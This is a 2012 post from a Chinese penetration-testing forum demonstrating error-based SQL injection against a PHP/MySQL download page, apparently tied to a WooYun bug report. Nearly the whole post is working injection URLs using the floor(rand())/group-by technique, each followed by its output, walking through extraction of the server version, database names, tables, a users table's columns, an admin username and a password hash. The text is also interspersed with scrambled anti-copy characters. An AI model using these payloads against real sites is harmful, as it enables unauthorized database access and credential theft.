中国网络渗透测试联盟

标题: php+mysql高级爆错注入经测算有效 [打印本页]

作者: admin    时间: 2012-9-13 17:52
标题: php+mysql高级爆错注入经测算有效
http://www.wooyun.org/bugs/wooyun-2010-01666* V. O5 g+ }/ ~) K5 u9 s2 g/ }
! S2 a" r1 {! ^; g& C% W& R! C
之前想找个测试 没想到这有 可以测试下做个记录而已
7 {6 {( _* ]1 \6 A4 j! {" v% W: N; n
3 a. A2 V4 A4 P2 ~) m. Uhttp://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
' o/ F* R% T$ I3 f
( k, h5 p  m# J- ^  c/data0/htdocs/leqi_new/app/myapp.php
; ~( _  B+ O2 j) s9 @7 |. P& \2 z, g9 p0 E! n$ J- ?* Y
或者
# O9 @8 g& K; O; t* ]  S1 p$ M, `4 S$ C/ W7 \& Q- {2 G: b
/**********version()**********/ 5.1.49-log) T  t! m% e5 H1 ^; u
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
8 V+ v# n+ Y4 m# G& D# ^3 I" s' M) z! v5 c- y
/**********user()**********/  
3 r; T3 @! w+ L$ H" j/ E6 S9 J% ^http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
, J7 c6 s3 b6 r2 Q- a
" S5 H- c! @% a' l) a0 {/**********database()**********/  leqi, k( D4 G" I5 }$ V. s7 C  S( Z0 G
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003# L1 ?# D; D- X. g. R% Y

; o. l+ O9 M; Y9 j  K/**********limit依次递归爆库**********/
, M& g& a; O' B# Y- |2 K6 v! }http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
4 _; q0 Z, n5 G$ G" j  `information_schema
7 o: H" b' v+ G+ T) z3 r& zhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003% T- m# Z( @1 l
leqi
& {& Z7 W1 i- mhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
6 M* b3 |2 J4 E& Y$ Ktest7 [7 `2 b  U2 m3 ^0 U+ W  G

2 G& F8 c: K) S( a" N! i( b8 O/**********limit依次递归爆表名**********/
5 D5 {) V/ K0 i) P2 u; dhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003& S5 @# i; x' w: {1 [6 z1 t4 G& b8 J
users+ w4 a. D+ k% n* r- g

9 l! O: [, L. ^& c/**********limit依次递归爆字段名**********/6 Q4 d1 E- a( {5 `/ {
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
6 P2 ^) ?, S8 ^user_id,username,nickname,passwd,group_id' m: F2 t0 u5 h
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23: I) C1 K% O7 R" i5 G4 O- g7 [
/wapc/5000_0005_003$ k9 P# {5 d/ g1 ?+ W' n
11 21% c( a( x; r* G, C: e& N7 L# N( }
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%238 T4 x) |. P/ G" ~1 a9 v0 N. K
/wapc/5000_0005_003
5 b/ i, S/ u9 Q11 341 351 3611 A1 z$ c% B6 `3 H
/**********爆数据**********/' |/ Y! ?1 ?" g
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
0 x2 Q- r3 [  `; Y* Fadmin. h  s, k9 ?* o
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%230 ~2 o3 P. z, P3 Q6 n
6a8b4574ca231eb8bd52764d4978ffcd# o5 @4 S& \/ `% b  X: S

! I3 U: f! ]' K
6 C( Q. `2 X6 f- C' |




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2